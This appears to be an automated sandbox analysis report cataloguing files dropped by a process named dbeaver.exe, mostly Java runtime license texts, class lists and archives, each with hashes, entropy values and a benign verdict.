      Preview:## GIFLIB v5.2.1..### GIFLIB License.```..The GIFLIB distribution is Copyright (c) 1997 Eric S. Raymond..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF C
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Unicode text, UTF-8 text
      Category:dropped
      Size (bytes):3094
      Entropy (8bit):5.396830234246826
      Encrypted:false
      SSDEEP:
      MD5:BCD114520BDFB6753EE7E6DF043A744B
      SHA1:04884862C0BFCAAB09243F67CD65165C64B218CA
      SHA-256:D56DB02B468421A886A859A6C403EBB4D2132AFC5A4DA858B47E206A662D6920
      SHA-512:CCCD664357B67BA7CE9A6AFFCFCA5F68CA531520ABBE7388041988B4117A36DB38C86068947392B0775FA52D0687E0539265567F6353B363D1D8926D497EDAD5
      Malicious:false
      Reputation:unknown
      Preview:## Harfbuzz v4.4.1..### Harfbuzz License..https://github.com/harfbuzz/harfbuzz/blob/4.4.1/COPYING..<pre>..HarfBuzz is licensed under the so-called "Old MIT" license. Details follow..For parts of HarfBuzz that are licensed under different licenses see individual.files names COPYING in subdirectories where applicable...Copyright . 2010-2022 Google, Inc..Copyright . 2018-2020 Ebrahim Byagowi.Copyright . 2019-2020 Facebook, Inc..Copyright . 2012-2015 Mozilla Foundation..Copyright . 2011 Codethink Limited.Copyright . 2008-2010 Nokia Corporation and/or its subsidiary(-ies).Copyright . 2009 Keith Stribley.Copyright . 2009 Martin Hosken and SIL International.Copyright . 2007 Chris Wilson.Copyright . 2005-2022 Behdad Esfahbod.Copyright . 2005 David Turner.Copyright . 2004-2013 Red Hat, Inc..Copyright . 1998-2004 David Turner and Werner Lemberg.Copyright . 2016 Elie Roux <elie.roux@telecom-bretagne.eu>.Copyright . 2018-2019 Adobe Inc..Copyright . 2018 Khaled Hosny.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):3475
      Entropy (8bit):4.758544977538361
      Encrypted:false
      SSDEEP:
      MD5:DE0E5A6CFC652C81EE7B582AA004DAD5
      SHA1:FC3BED0E9B640DAAC5C5336BADEBB3A55E89DFD5
      SHA-256:580BE596216EE11E2554B24CE944973ACAEDE2EBF5FFBA34A6BD8CC441C05043
      SHA-512:1B78C0FE3AECAF1D4DA9D7C5D84CB15D7ACEBDECBF73B224CF72B9F84BC269A84B8366150A63A28485EE61D51595CFBFC5FBE6A175A9E277D5A41038C9E0828B
      Malicious:false
      Reputation:unknown
      Preview:## Independent JPEG Group: JPEG release 6b..### JPEG License..```.****************************************************************************..Copyright (C) 1991-1998, Thomas G. Lane...This software is the work of Tom Lane, Philip Gladstone, Jim Boucher,.Lee Crocker, Julian Minguillon, Luis Ortiz, George Phillips, Davide Rossi,.Guido Vollbeding, Ge' Weijers, and other members of the Independent JPEG.Group...IJG is not affiliated with the official ISO JPEG standards committee. ..The authors make NO WARRANTY or representation, either express or implied,.with respect to this software, its quality, accuracy, merchantability, or.fitness for a particular purpose. This software is provided "AS IS",.and you, its user, assume the entire risk as to its quality and accuracy...This software is copyright (C) 1991-1998, Thomas G. Lane..All Rights Reserved except as specified below...Permission is hereby granted to use, copy, modify, and distribute.this software (or portions thereof) for any purpos
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1178
      Entropy (8bit):5.181163964818585
      Encrypted:false
      SSDEEP:
      MD5:62D9F462B20B37C861F5BAD14DE59D6A
      SHA1:5B6D5635FB89E55B3B0B49C1A104984DA34E6263
      SHA-256:41F4D63E670D75F5936A895AAE919E226F5D50C54B5B09DB3BA4D7052A2C1554
      SHA-512:27C9737A0B2B2B1BC897A69745F1C47B763D041BEB17A949411B534738FEC6091FCD005F86482BC95564A9A0EF09D2F2E74356E28C44A843C305A641402B64BD
      Malicious:false
      Reputation:unknown
      Preview:## Little Color Management System (LCMS) v2.12..### LCMS License.<pre>..Little Color Management System.Copyright (c) 1998-2020 Marti Maria Saguer..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the Software.is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO.THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OT
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):5398
      Entropy (8bit):4.817755042620107
      Encrypted:false
      SSDEEP:
      MD5:011DB3AD8FCF04AD9F5789F9E980D4C6
      SHA1:FEC756F73A909490115E5863D98C36681A89351C
      SHA-256:F9E1A0E556F3309246D30C62EF159DE7E21DB39361176DEDA6FB57821C9872EC
      SHA-512:B7F543A1F888D37F212B2EA68711640FC99655B7E29FF7DF53E3DA710973C4B333E769230F2DAC711C4509A642A5123C192F318483B96010565F06D8CCE6A918
      Malicious:false
      Reputation:unknown
      Preview:## libpng v1.6.37..### libpng License.<pre>..COPYRIGHT NOTICE, DISCLAIMER, and LICENSE.=========================================..PNG Reference Library License version 2.---------------------------------------.. * Copyright (c) 1995-2019 The PNG Reference Library Authors.. * Copyright (c) 2018-2019 Cosmin Truta.. * Copyright (c) 2000-2002, 2004, 2006-2018 Glenn Randers-Pehrson.. * Copyright (c) 1996-1997 Andreas Dilger.. * Copyright (c) 1995-1996 Guy Eric Schalnat, Group 42, Inc...The software is supplied "as is", without warranty of any kind,.express or implied, including, without limitation, the warranties.of merchantability, fitness for a particular purpose, title, and.non-infringement. In no event shall the Copyright owners, or.anyone distributing the software, be liable for any damages or.other liability, whether in contract, tort or otherwise, arising.from, out of, or in connection with the software, or the use or.other dealings in the software, even if advised of the possibilit
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):5732
      Entropy (8bit):5.1453426112774965
      Encrypted:false
      SSDEEP:
      MD5:C7E0D19C8F4EFF11E97F0EB9AFD3F7F4
      SHA1:6A98EE2703132E181F37D162452F073FB64CED83
      SHA-256:63F4E6F75CAEBBCCB95D903FB43E46AC7111B3624D0A34F146B276D7D9E7B152
      SHA-512:9C4111728AB9472F0B160CB11CE1E4EBD75A83CFDDCA0B3CB87243D15AFC5A7FA34DC6006E6B92084648CBAD1426F70B405259F589CDEF758442643E1618DFF4
      Malicious:false
      Reputation:unknown
      Preview:## Mesa 3-D Graphics Library v21.0.3..### Mesa License..```.Copyright (C) 1999-2007 Brian Paul All Rights Reserved...Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):44
      Entropy (8bit):4.507742914525315
      Encrypted:false
      SSDEEP:
      MD5:7CAF4CDBB99569DEB047C20F1AAD47C4
      SHA1:24E7497426D27FE3C17774242883CCBED8F54B4D
      SHA-256:B998CDA101E5A1EBCFB5FF9CDDD76ED43A2F2169676592D428B7C0D780665F2A
      SHA-512:A1435E6F1E4E9285476A0E7BC3B4F645BBAFB01B41798A2450390E16B18B242531F346373E01D568F6CC052932A3256E491A65E8B94B118069853F2B0C8CD619
      Malicious:false
      Reputation:unknown
      Preview:Please see ..\java.base\ASSEMBLY_EXCEPTION..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):11195
      Entropy (8bit):4.560484592386489
      Encrypted:false
      SSDEEP:
      MD5:8BC98021A73FF0A9CDAD9DC5E84339BE
      SHA1:023EF9164BE63E1794FF97C2A81BA05509919641
      SHA-256:E8C2AA528A5A0531482DBFD23EC9290FCDB373AF67A04870E780BDF98CD6ADC2
      SHA-512:1AE0CDECB6D3D9847E3178B663B38DD396775CEDD5F5745A23192CF6AFFC7667090F56756FA6C36CC762D62B55D2DBFD659323A275DEEFCDCC9ADBA0BEC77044
      Malicious:false
      Reputation:unknown
      Preview:## Apache Commons Byte Code Engineering Library (BCEL) Version 6.5.0..### Apache Commons BCEL Notice.<pre>.. Apache Commons BCEL. Copyright 2004-2020 The Apache Software Foundation.. This product includes software developed at. The Apache Software Foundation (https://www.apache.org/)...</pre>..### Apache 2.0 License.<pre>.. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/..TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION..1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Unicode text, UTF-8 text
      Category:dropped
      Size (bytes):3761
      Entropy (8bit):5.033869042271464
      Encrypted:false
      SSDEEP:
      MD5:13952C46B3867103AD7D1E9C6C9E906C
      SHA1:4BF3F9908314B05F3B0F6E27BE2C1FB7E25FFFBB
      SHA-256:6686E8877667584A3A7C07344BAADCA1A03E29F677162D87C3C0811E990D1148
      SHA-512:8C71F226F0F07B471AEA6B8E715434B5EAA6B4A59A653EC22C2489E743E9288A0C4537F479719F9D58737D0257470C9CCEFF9CE647A96E79FD757A4CDCFED499
      Malicious:false
      Reputation:unknown
      Preview:## DOM Level 3 Core Specification v1.0..### W3C Software Notice.<pre>.Copyright . 2004 World Wide Web Consortium, (Massachusetts Institute of Technology,.European Research Consortium for Informatics and Mathematics, Keio University)..All Rights Reserved...The DOM bindings are published under the W3C Software Copyright Notice and License..The software license requires "Notice of any changes or modifications to the W3C.files, including the date changes were made." Consequently, modified versions of.the DOM bindings must document that they do not conform to the W3C standard; in the.case of the IDL definitions, the pragma prefix can no longer be 'w3c.org'; in the.case of the Java language binding, the package names can no longer be in the.'org.w3c' package..</pre>..### W3C License.<pre>..W3C SOFTWARE NOTICE AND LICENSE..http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231..This work (and included software, documentation such as READMEs, or other.related items) is being prov
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1448
      Entropy (8bit):4.528798913343144
      Encrypted:false
      SSDEEP:
      MD5:D19594FBF6EAB2242DC29257905D8DED
      SHA1:FBDCBE5A7E7D91D440C200F5FB00E0CF6A81976C
      SHA-256:8D5DCFDF50455A3C34C753A98F21E953248AF200415A9084E3F102CB6C43B8BF
      SHA-512:7ED3E58F189F2922F7543D4617308D0C35F8ADC2E7CBBB6FBBA49D33CDD5DA64C6EDC022AE9842C28E58D97B056A245245C816003978F1E0152236636CA72BA5
      Malicious:false
      Reputation:unknown
      Preview:## CUP Parser Generator for Java v 0.11b..### CUP Parser Generator License..```.Copyright 1996-2015 by Scott Hudson, Frank Flannery, C. Scott Ananian, Michael Petter..Permission to use, copy, modify, and distribute this software and its.documentation for any purpose and without fee is hereby granted, provided.that the above copyright notice appear in all copies and that both.the copyright notice and this permission notice and warranty disclaimer.appear in supporting documentation, and that the names of the authors or.their employers not be used in advertising or publicity pertaining to.distribution of the software without specific, written prior permission...The authors and their employers disclaim all warranties with regard to.this software, including all implied warranties of merchantability and.fitness. In no event shall the authors or their employers be liable for.any special, indirect or consequential damages or any damages whatsoever.resulting from loss of use, data or profits, w
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):13494
      Entropy (8bit):4.618562983474662
      Encrypted:false
      SSDEEP:
      MD5:B29A2D48A582BE602D54DA738C304350
      SHA1:24D8FEA1126ACFC1EE4F990FD761D138637E6147
      SHA-256:EA67226BE5CFE19C7E79725C2C24A16676323264D69F9747C528DE0B44541B03
      SHA-512:1B63BEEFADAA6AB21A54A68ABE901A38624453F7CC3BA6870E831DFB9C23990D19B67ADA316E72A06129CFCB49CCC495C2ED6B35CD565F05E4AD1DCEB87E8752
      Malicious:false
      Reputation:unknown
      Preview:## Apache Xalan v2.7.2..### Apache Xalan Notice.<pre>.. ======================================================================================. == NOTICE file corresponding to the section 4d of the Apache License, Version 2.0, ==. == in this case for the Apache Xalan distribution. ==. ======================================================================================.. This product includes software developed by. The Apache Software Foundation (http://www.apache.org/)... Specifically, we only include the XSLTC portion of the source from the Xalan distribution. . The Xalan project has two processors: an interpretive one (Xalan Interpretive) and a . compiled one (The XSLT Compiler (XSLTC)). We *only* use the XSLTC part of Xalan; We use. the source from the packages that are part of the XSLTC sources... Portions of this software was originally based on the following:.. - software copyright (c) 1999-2002, Lotus Development
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):11852
      Entropy (8bit):4.611377085862739
      Encrypted:false
      SSDEEP:
      MD5:5FEAC4B0A3606D75537B6B9D355E5D3D
      SHA1:D5A230002B75EA8F003984000F743A85EADCF7C9
      SHA-256:472224F99DE833F4F4C19F2F8A0317F22114E1C641F5D77FFA3A4280A1B80176
      SHA-512:D0B638C8EF8BAB5630FAAD0D65B24735B567F7BD413E82F3CA48166C681CF00E8E543AB26EF8C6148A00956EF80C68C06C4FC31632352B403B39C799ECE4DBC2
      Malicious:false
      Reputation:unknown
      Preview:## Apache Xerces v2.12.2..### Apache Xerces Notice.<pre>. =========================================================================. == NOTICE file corresponding to section 4(d) of the Apache License, ==. == Version 2.0, in this case for the Apache Xerces Java distribution. ==. =========================================================================. . Apache Xerces Java. Copyright 1999-2022 The Apache Software Foundation.. This product includes software developed at. The Apache Software Foundation (http://www.apache.org/)... Portions of this software were originally based on the following:. - software copyright (c) 1999, IBM Corporation., http://www.ibm.com.. - software copyright (c) 1999, Sun Microsystems., http://www.sun.com.. - voluntary contributions made by Paul Eng on behalf of the. Apache Software Foundation that were originally developed at iClick, Inc.,. software copyright (c) 1999..</pre>..### Apache 2.0 License.<pre>..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Unicode text, UTF-8 text
      Category:dropped
      Size (bytes):3923
      Entropy (8bit):4.8260970484556776
      Encrypted:false
      SSDEEP:
      MD5:FA24B7E2A61A7045CB0C6C385000681B
      SHA1:869FC0B687986EA26B8FF63C137E03C92234A5C8
      SHA-256:262802E081760B38B3748C8B194353D340E39BC936AC22E17ABBB7158D895811
      SHA-512:2676CFDFD61762C7B6171985E8CFE1068C36683CA43753A1FFB10241AC61A74C9BE1C00BE22903DF85BA6954FD908D77DE60903C316506FD88B9679672ADA968
      Malicious:false
      Reputation:unknown
      Preview:## OASIS PKCS #11 Cryptographic Token Interface v3.0..### OASIS PKCS #11 Cryptographic Token Interface License.<pre>..Copyright . OASIS Open 2020. All Rights Reserved... All capitalized terms in the following text have the meanings.assigned to them in the OASIS Intellectual Property Rights Policy (the."OASIS IPR Policy"). The full Policy may be found at the OASIS website:.[http://www.oasis-open.org/policies-guidelines/ipr].. This document and translations of it may be copied and furnished to.others, and derivative works that comment on or otherwise explain it or.assist in its implementation may be prepared, copied, published, and.distributed, in whole or in part, without restriction of any kind,.provided that the above copyright notice and this section are included.on all such copies and derivative works. However, this document itself.may not be modified in any way, including by removing the copyright.notice or references to OASIS, except as needed for the purpose of.developing
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):2131
      Entropy (8bit):5.173293353802325
      Encrypted:false
      SSDEEP:
      MD5:B77D1951DF7A8488EB84CE1D25486A14
      SHA1:E35415235EC3BBCB92BEECEB03A9A8E7C13A6FCE
      SHA-256:371974B1FCA3744A3892C7EE1FCC593B8B4281FC218F4CAFD2F709E9DF5FD81D
      SHA-512:759C75F87309B67C56A5B7088045E04BE7C023ECDBAEA80842E22B81B0BFB36026191070471F8B08FEF47EC73664611CE0453B4A9818F7708C95663733EE5CE9
      Malicious:false
      Reputation:unknown
      Preview:## IAIK (Institute for Applied Information Processing and Communication) PKCS#11 wrapper files v1..### IAIK License.<pre>..Copyright (c) 2002 Graz University of Technology. All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:..1. Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright notice,. this list of conditions and the following disclaimer in the documentation. and/or other materials provided with the distribution...3. The end-user documentation included with the redistribution, if any, must. include the following acknowledgment:.. "This product includes software developed by IAIK of Graz University of. Technology.".. Alternately, this acknowledgment may appear in the software itself, if and. wherever such third-par
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):49
      Entropy (8bit):4.433601620014652
      Encrypted:false
      SSDEEP:
      MD5:19C9D1D2AAD61CE9CB8FB7F20EF1CA98
      SHA1:2DB86AB706D9B73FEEB51A904BE03B63BEE92BAF
      SHA-256:EBF9777BD307ED789CEABF282A9ACA168C391C7F48E15A60939352EFB3EA33F9
      SHA-512:7EC63B59D8F87A42689F544C2E8E7700DA5D8720B37B41216CBD1372C47B1BC3B892020F0DD3A44A05F2A7C07471FF484E4165427F1A9CAD0D2393840CD94E5B
      Malicious:false
      Reputation:unknown
      Preview:Please see ..\java.base\ADDITIONAL_LICENSE_INFO..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with very long lines (522)
      Category:dropped
      Size (bytes):71532
      Entropy (8bit):5.043947181644585
      Encrypted:false
      SSDEEP:
      MD5:1510596D623208E0760CC1CEC0994505
      SHA1:EE5FA903B04BDE21C6B34D3DF6747626A09A5264
      SHA-256:7C8B7581EE01EE39FEF42212567D68160BF786DEA2D24D6C2A50EBE30971E3D0
      SHA-512:CB8779422E1EE22D5B6CB0819BDA924BE9D16DDF8E955E5255A408E3978F39651E595873A5D5096A12B1EB9E2A2815016D2F7BCBCAF07290B446940B28E719E9
      Malicious:false
      Reputation:unknown
      Preview:# NOTE: Do not modify this file..#.# This file is generated via the -XX:DumpLoadedClassList=<class_list_file> option.# and is used at CDS archive dump time (see -Xshare:dump)..#.java/lang/Object.java/io/Serializable.java/lang/Comparable.java/lang/CharSequence.java/lang/constant/Constable.java/lang/constant/ConstantDesc.java/lang/String.java/lang/reflect/AnnotatedElement.java/lang/reflect/GenericDeclaration.java/lang/reflect/Type.java/lang/invoke/TypeDescriptor.java/lang/invoke/TypeDescriptor$OfField.java/lang/Class.java/lang/Cloneable.java/lang/ClassLoader.java/lang/System.java/lang/Throwable.java/lang/Error.java/lang/ThreadDeath.java/lang/Exception.java/lang/RuntimeException.java/lang/SecurityManager.java/security/ProtectionDomain.java/security/AccessControlContext.java/security/AccessController.java/security/SecureClassLoader.java/lang/ReflectiveOperationException.java/lang/ClassNotFoundException.java/lang/Record.java/lang/LinkageError.java/lang/NoClassDefFoundError.java/lang/ClassCa
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:raw G3 (Group 3) FAX
      Category:dropped
      Size (bytes):4630
      Entropy (8bit):4.437305910502734
      Encrypted:false
      SSDEEP:
      MD5:0E25B41E6ACF99681EAF2E8B572F18D1
      SHA1:D6B4290DA768E050FE6C310366272F87E6C2B6D2
      SHA-256:968AC99BBAAF8A49A474C934E73AD58F88C6C7F2A363CB44771E0378444E36BA
      SHA-512:7C1E98BC6582AF9E9C58C13CDC4D257E441A6D48FD395A3601AD558EBD481257F138D6F0DCBFE12735EB6BEBEB7C8985B3D8AF633B545FA01D56738F56360C08
      Malicious:false
      Reputation:unknown
      Preview:...1.......8.h...........................F.G.<.H./.6...=.0.7.2.:.I.@.8.?.1.>.C.4.-.5.D.A.;.B.3.9.E.......................................................................................................!.".#.&.'.(.).+.,.-.#.&.'.(.).+.,.-........................................... ... ... ... .).+.).+... ... ... ... .........$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.........%.%.%.%.*.*.*.*.%.%.%.%.%.%.%.%.O.K.T.P.L.U.R.M.Q.S.J.N...........................................................................................!.".#.$.%.&.'.(.).*.+.+.+.+.+.m.l._.`.V.n.j.|.o.c.a.k.X.d.].p.r.s.{.b.Y.~.g.}.e.y.\.W.z.[...f.q.x.^.t.v.Z.u.h.i.w...............................................................................................................!..... ...........#.$.%.'.&.).".(.....................................................................................................................................................................$............./........... .................#.(.-.2.7.<.A.F.K.P.U.[
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):12345
      Entropy (8bit):5.208754321730197
      Encrypted:false
      SSDEEP:
      MD5:5A1F8A604694AF3E955C12190DE02F6C
      SHA1:5309AE6DD01DE0090131ECC469E965F286186FA3
      SHA-256:B44540473B97364E0F7A8A0002DD21D7A0717028FA1533F139BC98F40C91C0F0
      SHA-512:DB9D26A8418AC50E74E877B2FFCE8F4D702D109606893E5577FDF467BA80A0339AD12AAC50E175F6F9A9D872540E404682B05B1F22B26CB416708013CA237A07
      Malicious:false
      Reputation:unknown
      Preview:#.# .# Copyright (c) 2003, 2019, Oracle and/or its affiliates. All rights reserved..# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER..#.# This code is free software; you can redistribute it and/or modify it.# under the terms of the GNU General Public License version 2 only, as.# published by the Free Software Foundation. Oracle designates this.# particular file as subject to the "Classpath" exception as provided.# by Oracle in the LICENSE file that accompanied this code..#.# This code is distributed in the hope that it will be useful, but WITHOUT.# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or.# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License.# version 2 for more details (a copy is included in the LICENSE file that.# accompanied this code)..#.# You should have received a copy of the GNU General Public License version.# 2 along with this work; if not, write to the Free Software Foundation,.# Inc., 51 Franklin St, Fifth Floor,
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:current ar archive
      Category:dropped
      Size (bytes):1682
      Entropy (8bit):4.46579411208616
      Encrypted:false
      SSDEEP:
      MD5:AE20E8EAE9D58E8CB6E6083258E4D5CE
      SHA1:3E5887C8B6C6A41A825A5F55A6A577AC7C87BC8A
      SHA-256:37BDB8C0A4FC742F15E0E8A685012FC9CDBBEC8AB6AFE5478244EFF9FCDD86EF
      SHA-512:5C5C1E8C7757CE765007841EBE9C39EFB699C0D605645C9C3341C5604998D499F554375081A80318FD900172FC5FF561B7E108165118E15F5951A1BCA86EBD8E
      Malicious:false
      Reputation:unknown
      Preview:!<arch>./ -1 0 126 `....................,...,__IMPORT_DESCRIPTOR_jawt.__NULL_IMPORT_DESCRIPTOR..jawt_NULL_THUNK_DATA.JAWT_GetAWT.__imp_JAWT_GetAWT./ -1 0 136 `.................,.................JAWT_GetAWT.__IMPORT_DESCRIPTOR_jawt.__NULL_IMPORT_DESCRIPTOR.__imp_JAWT_GetAWT..jawt_NULL_THUNK_DATA.jawt.dll/ -1 0 482 `.d.....]..............debug$S........>...................@..B.idata$2............................@.0..idata$6............................@. ..............jawt.dll'....................q.Microsoft (R) LINK..................................................jawt.dll..@comp.id.q...........................idata$2@.......h..idata$6...........idata$4@.......h..idata$5@.......h.......................6.............L...__IMPORT_DESCRIPTOR_jawt.__NULL_IMPORT_DESCRIPTOR..jawt_NULL_THUNK_DATA.jawt.dll/ -1 0 247 `.d....&..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):110510
      Entropy (8bit):7.931630085051669
      Encrypted:false
      SSDEEP:
      MD5:3437B8A52BE35F5B8E54141767A968BC
      SHA1:9030BDBE1E83C10CAC18B3DEE4AF89F9D3A187FD
      SHA-256:A13625274204B98FA7A42BF9F796121A0B9F998CE22DAAFAD702B9C4B8B91389
      SHA-512:82DC59DF3A856FBA9B229D0A51C358DC852069AC6EA414FA18BBB2BCF8C703B0FEA1A498E8281E593C891003EA0FBEE28DBB8F0A0A965D37DE407E3B351A310F
      Malicious:false
      Reputation:unknown
      Preview:PK........8N2V................META-INF/......PK..............PK........8N2V................META-INF/MANIFEST.MFm.M..@.E.......m...0....0>..|....}IA.m.=...r.a...rO..I3)..5u.U|f.....jT...;......l..<.k=.pb..B.9x~..6.....}.\$.P....Z._.4K......B.P.>D...%...&..4..XK!..PK....4`....0...PK........8N2V............6...META-INF/services/java.nio.file.spi.FileSystemProvider.J....+I-.K...**I+..**q..I..,.I..(./.LI-...PK....'.+...)...PK........7N2V............,...jdk/internal/jimage/BasicImageReader$1.class.TkO.A.=......,......X....@...k...a;.)...._i.H....G..l7R(1.&;wzz..s....?~.x.Wyd.5...~..Vc.~$..=.%wyS8.<...~..!Ty.!..2=.`.^i.=.x.o:.HI.Y..,...;......_.!.L\....!.3...V7[..../.y.l..n....%.Wp.....#..0....>....f*..z.j/d.:n..i..FO&J..K|...2.t..U7L..]..,.G.a.....~...X.b(U6.=..2......P.*.u..x.l......+...5%..'....F2........Yg.-..........P....\}.ro.+...`.....w.a..4.e..Q..t.D.iC....+..y.V..Y.b.R{.9.gJ..R......."....f...)..KP...;3y<..}.........0.!.V.^..*...~s...4Z:"K...9A.y
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):29
      Entropy (8bit):4.185230132909402
      Encrypted:false
      SSDEEP:
      MD5:7CE21BDCFA333C231D74A77394206302
      SHA1:C5A940D2DEE8E7BFC01A87D585DDCA420D37E226
      SHA-256:AA9EFB969444C1484E29ADECAB55A122458090616E766B2F1230EF05BC3867E0
      SHA-512:8B37A1A5600E0A4E5832021C4DB50569E33F1DDC8AC4FC2F38D5439272B955B0E3028EA10DEC0743B197AA0DEF32D9E185066D2BAC451F81B99539D34006074B
      Malicious:false
      Reputation:unknown
      Preview:-server KNOWN.-client IGNORE.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:current ar archive
      Category:dropped
      Size (bytes):1041252
      Entropy (8bit):5.490166733559908
      Encrypted:false
      SSDEEP:
      MD5:7E8EFCC3194A97E66749D264F83B9152
      SHA1:CCF6A541893A25ECC1125015AEE059C8020C8DA2
      SHA-256:7534DE81A2993DEB81EF94ABA75F1AE3A8488F0CFCE530DDEE2C45D94681255D
      SHA-512:EBA75F395DF1A5DAEB127A5F840E20C491908A1FFFF329F37F23E45713E7FA740E66A4ADD59D21E6884F908F5FD34715F6B2BEE3804FFA5625D42D1E86535F10
      Malicious:false
      Reputation:unknown
      Preview:!<arch>./ -1 0 289741 `........`...z..............~...~...........~...~...............................2...2...........F...F...........F...F...........J...J...........`...`...........t...t...........x...x...............................$...$.........*...*.........6...6.........6...6.........@...@.........(...(.........<...<...........X...X...........h...h...........r...r.................................B...B...........X...X...........d...d...........l...l...........t...t...................................................D...D...........h...h..................................."..."...........4...4...........>...>...........P...P...........Z...Z...........r...r...........x...x...........................>...>...........~...~...................................&...&........... ... ...........4...4...........4...4...........6...6...........................&...&...........>...>...................B...B...................F...F....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java module image (little endian), version 1.0
      Category:dropped
      Size (bytes):27224217
      Entropy (8bit):7.976099606341964
      Encrypted:false
      SSDEEP:
      MD5:D88C002F3F1D28038FB5D41691B697E5
      SHA1:6F22FC4153FB278AB12DFA6641F8F2936320F2F2
      SHA-256:C03975CBAFE2C36BEE400BE341E6C57BA1BD01C54AC99A71FB610EFA862AEC76
      SHA-512:9F7148ADB56ECE0D8F251BCCD7B3CEF86CF2BD41FEC322001DB094E601EDF346E44DB3D392C17701580D859A7CDCD82A0EEEE133F4879F4E03346C24353B9931
      Malicious:false
      Reputation:unknown
      Preview:.............M...M.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................}.......|...................z...w...s...........n...i...h...f.......e...d...a.......................\...[...Z...........Y...X...V...............O.......M.......................J...G.......F...........D...................A.......>...............:...........................................................4.......3...2...................,...........*...............(...........&...........%...$.......................!... ...........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):3793
      Entropy (8bit):5.260880283220047
      Encrypted:false
      SSDEEP:
      MD5:D4C735BF5756759A1C3BC8DE408629FC
      SHA1:67C15E05A398B4CE6409D530A058F7E1B2208C20
